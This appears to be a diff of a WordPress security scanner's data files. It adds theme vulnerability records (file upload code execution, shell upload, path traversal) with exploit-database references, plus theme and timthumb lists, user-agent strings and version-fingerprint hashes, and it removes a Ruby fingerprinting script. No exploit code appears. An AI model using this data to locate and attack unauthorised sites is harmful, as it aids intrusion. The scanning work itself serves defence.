+      <title>Parallax - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="bold">
+    <vulnerability>
+      <title>Bold - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="metro">
+    <vulnerability>
+      <title>Metro - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="pinshop">
+    <vulnerability>
+      <title>Pinshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="agency">
+    <vulnerability>
+      <title>Agency - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="slide">
+    <vulnerability>
+      <title>Slide - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="postline">
+    <vulnerability>
+      <title>Postline - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="fullscreen">
+    <vulnerability>
+      <title>Fulscreen - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="shopo">
+    <vulnerability>
+      <title>Shopo - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="minshop">
+    <vulnerability>
+      <title>Minshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="notes">
+    <vulnerability>
+      <title>Notes - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="shopdock">
+    <vulnerability>
+      <title>Shopdock - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="phototouch">
+    <vulnerability>
+      <title>Phototouch - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="basic">
+    <vulnerability>
+      <title>Basic - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="responz">
+    <vulnerability>
+      <title>Responz - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="simfo">
+    <vulnerability>
+      <title>Simfo - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="grido">
+    <vulnerability>
+      <title>Grido - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="tisa">
+    <vulnerability>
+      <title>Tisa - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="funki">
+    <vulnerability>
+      <title>Funki - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="minblr">
+    <vulnerability>
+      <title>Minblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="newsy">
+    <vulnerability>
+      <title>Newsy - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="wumblr">
+    <vulnerability>
+      <title>Wumblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="rezo">
+    <vulnerability>
+      <title>Rezo - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="photobox">
+    <vulnerability>
+      <title>Photobox - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="edmin">
+    <vulnerability>
+      <title>Edmin - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="koi">
+    <vulnerability>
+      <title>Koi - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="bizco">
+    <vulnerability>
+      <title>Bizco - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="thememin">
+    <vulnerability>
+      <title>Thememin - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="wigi">
+    <vulnerability>
+      <title>Wigi - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="sidepane">
+    <vulnerability>
+      <title>Sidepane - themify-ajax.php File Upload Arbitrary Code Execution</title>
+      <references>
+        <osvdb>100271</osvdb>
+        <url>http://packetstormsecurity.com/files/124097/</url>
+        <url>http://1337day.com/exploit/22090</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="Sixtees">
+    <vulnerability>
+      <title>Sixtees - Shell Upload</title>
+      <references>
+        <url>http://packetstormsecurity.com/files/125491/</url>
+      </references>
+      <type>UPLOAD</type>
+    </vulnerability>
+  </theme>
+
+  <theme name="linenity">
+    <vulnerability>
+      <title>LineNity 1.20 - download.php imgurl Parameter Remote Path Traversal File Access</title>
+      <references>
+        <osvdb>105767</osvdb>
+        <exploitdb>32861</exploitdb>
+      </references>
+      <type>LFI</type>
+    </vulnerability>
+  </theme>
+
 </vulnerabilities>

data/themes.txt

@@ -1,67 +1,51 @@
+aadya
+abaris
 academica
-activetab
 adamos
 adelle
-admired
 adventure
+advertica-lite
 aldehyde
 alexandria
 analytical-lite
-anarcho-notepad
-andrina-lite
-appointment
-aquarius
-ascetica
-aspen
+apprise
+arcade-basic
 asteria-lite
-asteroid
 atahualpa
 attitude
-autofocus
+base-wp
 beach
 bearded
-bicubic
-birdsite
-bizantine
 bizark
 bizflare
 bizkit
 biznez-lite
-bizsphere
 bizstudio-lite
-bizway
 blackbird
-blain
 blankslate
-blogbox
-blogly-lite
-blogolife
-blogotron
 blox
-blue-planet
 boldr-lite
 boot-store
 bootstrap-ultimate
-bota
 bouquet
 bresponzive
 brightnews
-bueno
-bushwick
+briks
 business-lite
+business-pro
 busiprof
 butterbelly
 buzz
-byblos
-carton
+capture
+careta
 catch-box
 catch-everest
 catch-evolution
+catch-kathmandu
 celestial-lite
 chaostheory
-childishly-simple
-chooko-lite
 church
+circumference-lite
 cirrus
 clean-retina
 coller
@@ -69,14 +53,16 @@ colorway
 contango
 coraline
 corpo
-crates
-current
+count-down
+crangasi
 custom-community
 customizr
 cyberchimps
-d5-socialia
+dark-tt
+dazzling
 decode
 designfolio
+desk-mess-mirrored
 destro
 discover
 dms
@@ -84,217 +70,230 @@ duena
 dusk-to-dawn
 duster
 dw-minion
+dw-timeline
 dw-wallpress
-dzonia-lite
 eclipse
-elisium
 engrave-lite
 enough
-envision
-epic
 esell
 esplanade
 esquire
-estate
 evolve
+expert
 expound
 family
+faq
 fashionistas
-fastr
-figero
+fifteen
 fine
 firmasite
-fixy
+flat
 flounder
 focus
-forestly
 forever
-formidable-restaurant
-frau
+formation
 fresh-lite
 frisco-for-buddypress
 frontier
 fruitful
-future
 gamepress
-gold
-golden-eagle-lite
+govpress
 graphene
-gridbulletin
-gridiculous
+graphy
 gridster-lite
 hatch
 hazen
-hero
+health-center-lite
+hemingway
+hiero
 highwind
 hueman
-hypnotist
+i-transform
 iconic-one
 ifeature
+ignite
+imprint
+independent-publisher
+infinite
+infoway
 inkness
 inkzine
+interface
 intuition
 invert-lite
 iribbon
 isis
-journalism
+italian-restaurant
+itek
+jbst
+jbst-masonary
+journal-lite
+justwrite
+kavya
 klasik
+landscape
 leatherdiary
-leniy-radius
-limelight
-lizardbusiness
-local-business
-lugada
+lingonberry
+looki-lite
+lupercalia
+madeini
 magazine-basic
 magazine-style
 magazino
 mantra
+market
+marketer
+match
+matheson
 max-magazine
 meadowhill
-medicine
 mesocolumn
 mh-magazine-lite
-ming
+midnightcity
+minima-lite
 minimatica
 minimize
-modern-estate
+mn-flow
+modern-business
+monaco
 montezuma
-multiloquent
+naturefox
+neighborly
 neuro
-neutro
-newdark
-newlife
-newp
-newtek
+newgamer
+news-flash
+newspress-lite
 next-saturday
 nictitate
 omega
 one-page
-onecolumn
+onetone
 openstrap
 opulus-sombre
 origami
 origin
 oxygen
 p2
+padhang
 pagelines
+papercuts
 parabola
 parallax
 parament
 phonix
-photolistic
-piedmont
 pilcrow
 pilot-fish
 pinbin
 pinboard
 pink-touch-2
-pitch
+pisces
 platform
 point
 portfolio-press
-pr-pin
+pr-news
 preference-lite
+presentation-lite
 preus
 primo-lite
-privatebusiness
+promax
 quark
+radiant
+radiate
 raindrops
+rambo
 raptor
 raven
 ready-review
-reddle
-redify
-reizend
-response
+resolution
 responsive
+restaurante
 restaurateur
+restimpo
 reviewgine-affiliate
+rewind
 ridizain
-rtpanel
-rundown
+road-fighter
 sampression-lite
+seismic-manhattan
 sensitive
-serene
+sequel
+shamatha
 shopping
-sigma
-silverclean-lite
+siempel
+silver-quantum
 simple-catch
-simpleo
-simplicity-lite
+simply-vision
+singl
 sixteen
+skt-full-width
 sliding-door
+smpl-skeleton
 snaps
 snapshot
+sneak-lite
 sorbet
+spacious
+sparkling
 spartan
 spasalon
 sporty
 spun
+squirrel
+stairway
 stargazer
-startupwp
+start-point
 steira
-strapvert
+storefront-paper
+story
 suevafree
 suffusion
 sugar-and-spice
-suits
-sukelius-magazine
 sundance
-sunny-blue-sky
+sunrain
 sunspot
+superhero
 supernova
 surfarama
 swift-basic
-syntax
-tanzanite
+taraza
+tatva-lite
 teal
-techism
 tempera
+temptation
 terrifico
-the-falcon
+the-newswire
 thematic
-themia-lite
 theron-lite
 tiny-forge
+tonal
 tonic
-travel-blogger
-travel-lite
 travelify
 twentyeleven
 twentyfourteen
 twentyten
 twentythirteen
 twentytwelve
+typal-makewp005
 unite
+untitled
 vantage
 venom
 viper
 virtue
-voyage
+vision
+visual
+vryn-restaurant
 ward
 weaver-ii
-weavr
-wiziapp-smooth-touch
-wordplus
-wp-advocate
-wp-barrister
+wilson
 wp-creativix
 wp-opulus
 wp-simple
+wpchimp-countdown
+wpstart
 writr
 x2
+xin-magazine
 yoko
-zalive
-zbench
-zeebizzcard
-zeebusiness
 zeedynamic
 zeeflow
-zeefocus
-zeeminty
-zeenoble
-zeestyle
-zeesynergie
-zeetasty
-zenon-lite

data/timthumbs.txt

@@ -115,6 +115,7 @@ $wp-plugins$/islidex/js/timthumb.php
 $wp-plugins$/islidex/js/timthumb.phpthumb.php
 $wp-plugins$/islidex/js/timthumb.phptimthumb.php
 $wp-plugins$/jquery-slider-for-featured-content/scripts/timthumb.php
+$wp-plugins$/js-multihotel/includes/timthumb.php
 $wp-plugins$/kc-related-posts-by-category/timthumb.php
 $wp-plugins$/kino-gallery/timthumb.php
 $wp-plugins$/lisl-last-image-slider/timthumb.php

data/user-agents.txt

@@ -0,0 +1,36 @@
+# Windows
+Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5
+Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1
+Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)
+Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
+Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
+Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1
+Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
+Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
+Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)
+Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00
+Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
+
+# MAC
+Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13
+Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
+Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
+
+# Linux
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24
+Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9
+Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0
+Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
+Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00
+Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0

data/vuln.xsd

@@ -40,6 +40,7 @@
       <xs:enumeration value="CSRF"/>
       <xs:enumeration value="SSRF"/>
       <xs:enumeration value="AUTHBYPASS"/>
+      <xs:enumeration value="BYPASS"/>
       <xs:enumeration value="FPD"/>
       <xs:enumeration value="XXE"/>
     </xs:restriction>

data/wp_versions.xml

@@ -10,16 +10,74 @@
 <wp-versions xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:noNamespaceSchemaLocation="wp_versions.xsd">
 
-  <file src="wp-includes/css/buttons-rtl.css">
-    <hash md5="fb062ed92b76638c161e80f4a5426586">
+  <file src="readme.html">
+    <hash md5="cdbf9b18e3729b3553437fc4e9b6baad">
+      <version>3.9.1</version>
+    </hash>
+    <hash md5="84b54c54aa48ae72e633685c17e67457">
+      <version>3.9</version>
+    </hash>
+    <hash md5="c6de8fc70a18be7e5c36198cd0f99a64">
+      <version>3.8.3</version>
+    </hash>
+    <hash md5="e01a2663475f6a7a8363a7c75a73fe23">
+      <version>3.8.2</version>
+    </hash>
+    <hash md5="0d0eb101038124a108f608d419387b92">
       <version>3.8.1</version>
     </hash>
+    <hash md5="38ee273095b8f25b9ffd5ce5018fc4f0">
+      <version>3.8</version>
+    </hash>
+    <hash md5="813e06052daa0692036e60d76d7141d3">
+      <version>3.7.3</version>
+    </hash>
+    <hash md5="b3a05c7a344c2f53cb6b680fd65a91e8">
+      <version>3.7.2</version>
+    </hash>
+    <hash md5="e82f4fe7d3c1166afb4c00856b875f16">
+      <version>3.6.1</version>
+    </hash>
+    <hash md5="477f1e652f31dae76a38e3559c91deb9">
+      <version>3.6</version>
+    </hash>
+    <hash md5="caf7946275c3e885419b1d36b22cb5f3">
+      <version>3.5.2</version>
+    </hash>
+    <hash md5="05d50a04ef19bd4b0a280362469bf22f">
+      <version>3.5.1</version>
+    </hash>
+    <hash md5="066cfc0f9b29ae6d491aa342ebfb1b71">
+      <version>3.5</version>
+    </hash>
+    <hash md5="36b2b72a0f22138a921a38db890d18c1">
+      <version>3.3.3</version>
+    </hash>
+    <hash md5="628419c327ca5ed8685ae3af6f753eb8">
+      <version>3.3.2</version>
+    </hash>
+    <hash md5="c1ed266e26a829b772362d5135966bc3">
+      <version>3.3.1</version>
+    </hash>
+    <hash md5="9ea06ab0184049bf4ea2410bf51ce402">
+      <version>3.0</version>
+    </hash>
+  </file>
+
+  <file src="wp-includes/css/buttons-rtl.css">
     <hash md5="71c13ab1693b45fb3d7712e540c4dfe0">
       <version>3.8</version>
     </hash>
   </file>
 
   <file src="wp-includes/js/tinymce/wp-tinymce.js.gz">
+    <hash md5="de42820ca28cfc889f428dbef29621c3">
+      <version>3.9.1</version>
+    </hash>
+    <hash md5="1d52314b1767c557b7232ae192c80318">
+      <version>3.9</version>
+    </hash>
+    <!-- Note: 3.7.1 has no unique file (the hash below is the same than the 3.7.2) -->
     <hash md5="44d281b0d84cc494e2b095a6d2202f4d">
       <version>3.7.1</version>
     </hash>
@@ -64,13 +122,6 @@
     </hash>
   </file>
 
-  <file src="$wp-content$/themes/twentyeleven/style.css">
-    <!-- same md5 for 3.3.2 -->
-    <hash md5="030d3bac906ba69e9fbc99c5bac54a8e">
-      <version>3.3.1</version>
-    </hash>
-  </file>
-
   <file src="wp-admin/js/common.js">
     <hash md5="4516252d47a73630280869994d510180">
       <version>3.3</version>

dev/wp-versions.rb

@@ -1,237 +0,0 @@
-#!/usr/bin/env ruby
-
-require 'rubygems'
-require 'uri'
-require 'dm-core'
-require 'dm-migrations'
-require 'dm-constraints'
-require 'optparse'
-require 'nokogiri'
-require 'typhoeus'
-
-@db = "#{Dir.pwd}/wp-versions.db"
-
-# return [ Array<String> ] The Stable versions (sorted by number DESC)
-def get_remote_wp_versions
-  versions = []
-  page = Nokogiri::HTML(Typhoeus.get('http://wordpress.org/download/release-archive/').body)
-
-  page.css('.widefat').first.css('tbody tr td:first').each do |node|
-    versions << node.text.strip
-  end
-  versions.reverse
-end
-
-def remove_dir(dir)
-  %x{rm -rf #{dir}}
-end
-
-def download(file_url, dest)
-  %x{wget -q -np -O #{dest} #{file_url} > /dev/null}
-end
-
-def wp_version_zip_url(version)
-  "http://wordpress.org/wordpress-#{version}.zip"
-end
-
-def wp_version_zip_md5(version)
-  Typhoeus.get("#{wp_version_zip_url(version)}.md5").body
-end
-
-def file_md5(file_path)
-  Digest::MD5.file(file_path).hexdigest
-end
-
-def web_page_md5(url)
-  Digest::MD5.hexdigest(Typhoeus.get(url).body)
-end
-
-def download_and_unzip_version(version, dest)
-  dest_zip = "/tmp/wp-#{version}.zip"
-
-  download(wp_version_zip_url(version), dest_zip)
-
-  if $?.exitstatus === 0 and File.exists?(dest_zip)
-    if file_md5(dest_zip) === wp_version_zip_md5(version)
-      remove_dir("#{dest}/wordpress/")
-      unzip(dest_zip, dest)
-
-      return true
-    else
-      raise 'Invalid md5'
-      # Redownload the file ?
-    end
-  else
-    raise 'Download error'
-  end
-end
-
-def unzip(zip_path, dest)
-  %x{unzip -o -d #{dest} #{zip_path}}
-end
-
-parser = OptionParser.new("Usage: ruby #{$0} [options]", 50) do |opts|
-  opts.on('--db PATH-TO-DB', '-d', 'Path to the db, default: wp-versions.db') do |db|
-    @db = db
-  end
-
-  opts.on('--update', '-u', 'Update the db') do
-    @update = true
-  end
-
-  opts.on('--verbose', '-v', 'Verbose Mode') do
-    @verbose = true
-  end
-
-  opts.on('--show-unique-fingerprints WP-VERSION', '--suf', 'Output the unique file hashes for the given version of WordPress') do |version|
-    @version = version
-  end
-
-  opts.on('--search-hash HASH', '--sh', 'Search the hash and output the WP versions & file') do |hash|
-    @hash = hash
-  end
-
-  opts.on('--search-file RELATIVE-FILE-PATH', '--sf', 'Search the file and output the Wp versions & hashes') do |file|
-    @file = file
-  end
-
-  opts.on('--fingerprint URL', 'Fingerprint a remote wordpress blog') do |url|
-    @target_url  = url
-    @target_url += '/' if @target_url[-1,1] != '/'
-  end
-end
-parser.parse!
-
-DataMapper::Logger.new($stdout, @verbose ? :debug : :fatal)
-DataMapper::setup(:default, "sqlite://#{@db}")
-
-class Version
-  include DataMapper::Resource
-
-  has n, :fingerprints, constraint: :destroy
-
-  property :id, Serial
-  property :number, String, required: true, unique: true
-end
-
-class Path
-  include DataMapper::Resource
-
-  has n, :fingerprints, constraint: :destroy
-
-  property :id, Serial
-  property :value, String, required: true, unique: true
-end
-
-class Fingerprint
-  include DataMapper::Resource
-
-  belongs_to :version, key: true
-  belongs_to :path, key: true
-
-  property :md5_hash, String, required: true, length: 32
-
-  # DataMapper does not seem to support ordering by a column in a joining model
-  # Solution found on StackOverflow ("DataMapper: Sorting results though association")
-  def self.order_by_version(direction = :asc)
-    order = DataMapper::Query::Direction.new(version.number, direction)
-    query = all.query
-    query.instance_variable_set('@order', [order])
-    query.instance_variable_set('@links', [relationships['version'].inverse])
-    all(query)
-  end
-end
-
-DataMapper.auto_upgrade!
-
-# Update
-if @update
-  remote_versions = get_remote_wp_versions()
-  puts "#{remote_versions.size} remote versions number retrieved"
-
-  remote_versions.each do |version|
-    unless Version.first(number: version)
-      db_version = Version.create(number: version)
-      version_dir = "/tmp/wordpress/"
-
-      puts "Downloading and unziping v#{version} to #{version_dir}"
-      download_and_unzip_version(version, '/tmp/')
-
-      puts 'Processing Fingerprints'
-      Dir[File.join(version_dir, '**', '*')].reject { |f| f =~ /^*.php$/ || Dir.exists?(f) }.each do |filename|
-        hash      = Digest::MD5.file(filename).hexdigest
-        file_path = filename.gsub(version_dir, '')
-        db_path   = Path.first_or_create(value: file_path)
-        fingerprint = Fingerprint.create(path_id: db_path.id, md5_hash: hash)
-
-
-        db_version.fingerprints << fingerprint
-      end
-      db_version.save
-    else
-      puts "Version #{version} already in DB, skipping"
-    end
-  end
-end
-
-if @version
-  if version = Version.first(number: @version)
-    repository(:default).adapter.select('SELECT md5_hash, path_id, version_id, paths.value AS path FROM fingerprints LEFT JOIN paths ON path_id = id WHERE md5_hash NOT IN (SELECT DISTINCT md5_hash FROM fingerprints WHERE version_id != ?) ORDER BY path ASC', version.id).each do |f|
-      if f.version_id == version.id
-        puts "#{f.md5_hash} #{f.path}"
-      end
-    end
-  else
-    puts "The version supplied: '#{@version}' is not in the database"
-  end
-end
-
-if @hash
-  puts "Results for #{@hash}:"
-  Fingerprint.order_by_version(:desc).all(md5_hash: @hash).each do |f|
-    puts "  #{f.version.number} #{f.path.value}"
-  end
-end
-
-if @file
-  puts "Results for #{@file}:"
-
-  if path = Path.first(value: @file)
-    Fingerprint.order_by_version(:desc).all(path_id: path.id).each do |f|
-      puts "  #{f.md5_hash} #{f.version.number}"
-    end
-  else
-    puts 'File not found (the argument must be a relative file path. e.g: wp-admin/css/widgets.css)'
-  end
-end
-
-if @target_url
-  uri = URI.parse(@target_url)
-
-  Version.all(order: [ :number.desc ]).each do |version|
-    total_urls = version.fingerprints.count
-    matches    = 0
-    percent    = 0
-
-    version.fingerprints.each do |f|
-      url = uri.merge(f.path.value).to_s
-
-      if web_page_md5(url) == f.md5_hash
-        matches += 1
-        puts "#{url} matches v#{version.number}" if @verbose
-      end
-
-      percent = ((matches / total_urls.to_f) * 100).round(2)
-
-      print("Version #{version.number} [#{matches}/#{total_urls} #{percent}% matches]\r")
-    end
-
-    puts
-
-    if percent == 100.0
-      puts "The remote version is #{version.number}"
-      exit
-    end
-  end
-end
-

example.conf.json

@@ -0,0 +1,18 @@
+{
